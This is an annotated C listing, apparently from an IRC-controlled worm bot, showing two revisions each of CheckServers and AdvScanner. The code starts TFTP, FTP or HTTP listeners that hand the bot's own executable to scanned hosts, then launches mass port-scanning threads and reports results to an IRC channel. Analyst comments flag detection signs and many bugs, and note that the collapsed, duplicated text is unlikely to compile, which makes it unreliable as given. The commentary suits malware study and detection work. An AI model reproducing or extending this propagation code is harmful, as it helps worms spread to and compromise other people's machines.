/*
 * CheckServers: before a scan job starts, make sure the helper server that the
 * selected exploit needs is running, then log / announce the outcome.
 *  - scan.exploit == -1 means no exploit selected; nothing is started.
 *  - exploit[].tftp: if no TFTP_THREAD exists, fill the file-lifetime `tftp`
 *    object and start tftpserver(); the same is then done for `ftp` / ftpd().
 *    In both cases the served file is this process's own image
 *    (GetModuleFileName) and the advertised name is the file-scope `filename`,
 *    i.e. the listener exists to hand the running executable to the hosts the
 *    scanner reaches.  Detection angle: a process that holds an IRC socket,
 *    opens a TFTP/FTP/HTTP listener and serves its own binary.
 *  - exploit[].http: same idea via HTTP_Server_Thread(), serving the directory
 *    the executable lives in (strrchr() strips the file name from httpd.dir).
 * Code-quality observations, all visible in the listing:
 *  - `static TFTP tftp` / `static HTTPD httpd` are handed to the new thread by
 *    pointer and then polled (`while (x.gotinfo == FALSE) Sleep(50)`) with no
 *    synchronisation.  `ftp` is not declared in this block (its declaration is
 *    commented out), so it must be a file-scope object -- not visible here.
 *  - `if (threads[n].tHandle = CreateThread(...))` is assignment-as-condition.
 *  - strncpy() with sizeof(dst)-1 never writes the terminator; termination
 *    relies on the static objects' zero-initialisation.
 *  - `sprintf(httpd.chan, scan.chan)` uses a non-literal format string
 *    (CERT FIO30-C); every sprintf() into sendbuf[IRCLINE] is unbounded.
 *  - The listing is collapsed onto two physical lines; the `//` comments mark
 *    where original lines ended.  As shown, `#ifndef NO_FTPD` has no live
 *    `#endif` and the FTP block sits inside the
 *    `if (findthreadid(TFTP_THREAD) == 0) {` block, so the text is unlikely to
 *    compile verbatim.  A second revision of this function appears further
 *    down in the same listing.
 */
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; /* served file: this process's own image path */ GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { /* polls a field presumably set by tftpserver() -- no synchronisation */ while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); #endif #ifndef NO_FTPD // static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif } } else if (exploit[scan.exploit].http) { if (findthreadid(HTTP_THREAD) == 0) { static HTTPD httpd; char *c; 
/* httpd.dir = directory of this executable (file name stripped below) */ GetModuleFileName(0,httpd.dir,sizeof(httpd.dir)); if ((c=strrchr(httpd.dir,'\\')) != NULL) *c='\0'; httpd.port = httpport; httpd.enabled = FALSE; /* non-literal format string (CERT FIO30-C) */ sprintf(httpd.chan, scan.chan); httpd.sock = scan.sock; httpd.notice = scan.notice; httpd.silent = scan.silent; sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir); httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL); if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) { /* unsynchronised poll of a field the server thread is expected to set */ while(httpd.info == FALSE) Sleep(50); } else sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); } } } return; }
/*
 * CheckServers (second revision in this listing): same flow as the copy above --
 * when an exploit is selected and it is TFTP-based, start the TFTP and FTP
 * helpers that serve this process's own executable -- but with `tftp -- ` /
 * `ftp -- ` message prefixes and without the HTTP branch.  Two definitions of
 * the same function cannot coexist in one translation unit, so this page most
 * likely concatenates two versions of the file.
 * The same observations apply: file-lifetime objects shared with a thread and
 * polled without synchronisation, assignment-as-condition around
 * CreateThread(), terminator-less strncpy(), unbounded sprintf() into
 * sendbuf[IRCLINE], an `#ifndef NO_FTPD` with no live `#endif`, and the FTP
 * block nested inside the `if (findthreadid(TFTP_THREAD) == 0) {` block.
 */
void CheckServers(ADVSCAN scan) { char sendbuf[IRCLINE]; DWORD id; if(scan.exploit != -1) { if (exploit[scan.exploit].tftp) { #ifndef NO_TFTPD if (findthreadid(TFTP_THREAD) == 0) { static TFTP tftp; tftp.port = tftpport; tftp.threads = 0; /* served file: this process's own image path */ GetModuleFileName(0,tftp.filename,sizeof(tftp.filename)); strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1); tftp.sock=scan.sock; tftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1); tftp.silent = TRUE; } else { strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1); tftp.silent = FALSE; } sprintf(sendbuf, "tftp -- Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname); tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL); if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) { /* polls a field presumably set by tftpserver() -- no synchronisation */ while (tftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "tftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); #endif #ifndef NO_FTPD // static FTP ftp; //ftp.port = FTP_PORT; ftp.threads = 0; GetModuleFileName(0,ftp.filename,sizeof(ftp.filename)); strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1); ftp.sock=scan.sock; ftp.notice = scan.notice; if (scan.msgchan[0] == '\0') { strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1); ftp.silent = TRUE; } else { strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1); ftp.silent = FALSE; } sprintf(sendbuf, "ftp -- Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname); ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL); if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) { while (ftp.gotinfo == FALSE) Sleep(50); } else sprintf(sendbuf, "ftp -- Failed to start server, error: <%d>.", GetLastError()); addlog(sendbuf); // #endif } } } return; }
/*
 * AdvScanner: thread entry for one scan job (an ADVSCAN passed through `param`).
 * Flow visible here:
 *  1. Copy *param to a local, set the caller's `gotinfo` so it may reuse its
 *     buffer, record the target (finet_addr(scan.ip)) in advinfo[] and call
 *     CheckServers() so the payload-serving listener is up before scanning.
 *  2. If this is the only SCAN_THREAD, (re)create the shared CriticalSection.
 *     DeleteCriticalSection() on an object that was never initialised is
 *     undefined under the Win32 contract; the "just in case" comment glosses
 *     over that.
 *  3. Spawn scan.threads AdvPortScanner workers, each registered with
 *     addthread() and given a pointer to the SAME local `scan`; the parent
 *     spins on `scan.cgotinfo` before reusing it for the next worker.  Nothing
 *     in the loop resets cgotinfo to FALSE, so once the first worker sets it
 *     later iterations do not wait at all (unless AdvPortScanner clears it --
 *     not visible here).
 *  4. Wait scan.minutes (60000*minutes may overflow for large values) or until
 *     the workers clear advinfo[].info, announce completion on IRC, tear down
 *     and ExitThread(0).
 * Detection angle: a process that holds an IRC socket, opens a TFTP/FTP/HTTP
 * listener and then fans out connections to one port across many hosts.
 * Non-void function whose only normal exit is ExitThread(0); compilers may
 * warn about the missing return.  A second revision follows in this listing.
 */
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; /* signal the caller that *param has been copied */ scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { /* UB if CriticalSection was never initialised */ DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { sprintf(buffer,"Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; /* &scan is the parent's local, reused for every worker */ if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { /* cgotinfo is never reset to FALSE inside this loop */ while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } /* 60000*minutes may overflow for large values */ if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
/*
 * AdvScanner (second revision in this listing): same job as the copy above --
 * resolve the target, start the helper server via CheckServers(), fan out
 * scan.threads AdvPortScanner workers, wait, announce "[scan]: Finished ..."
 * on IRC, tear down and ExitThread(0).
 * Differences from the earlier copy:
 *  - The self-copy of the executable to szLocalPayloadFile survives only inside
 *    a block comment ("FIX ME"), so szSelfExe[MAX_PATH] is declared but unused.
 *  - threads[].port is recorded per worker, the CreateThread() result is no
 *    longer checked, and the `cgotinfo` handshake is replaced by Sleep(50).
 *    Every worker still receives a pointer to the parent's local `scan`, which
 *    the parent rewrites (cthreadid, cthreadnum) on the next iteration, so a
 *    slow-starting worker can observe the next iteration's values.
 *  - Messages carry a "[scan]: " prefix instead of sc_title.
 * Remaining observations as above: DeleteCriticalSection() on a possibly
 * uninitialised object, 60000*scan.minutes may overflow for large values,
 * unbounded sprintf() into buffer[LOGLINE], and no return on the
 * ExitThread() path.
 */
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE], szSelfExe[MAX_PATH]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; /* signal the caller that *param has been copied */ scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); /* // FIX ME: Make this a standalone function if (!FileExists(szLocalPayloadFile)) { GetModuleFileName(0,szSelfExe,MAX_PATH); CopyFile(szSelfExe,szLocalPayloadFile,FALSE); // FIX ME: Make this copy to the same directory (could affect other stuff) } */ CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { /* UB if CriticalSection was never initialised */ DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { // failed to initialize CriticalSection sprintf(buffer,"[scan]: Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; threads[scan.cthreadnum].port = scan.port; /* result unchecked; &scan is the parent's local, rewritten next iteration */ threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0); Sleep(50); } /* 60000*minutes may overflow for large values */ if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }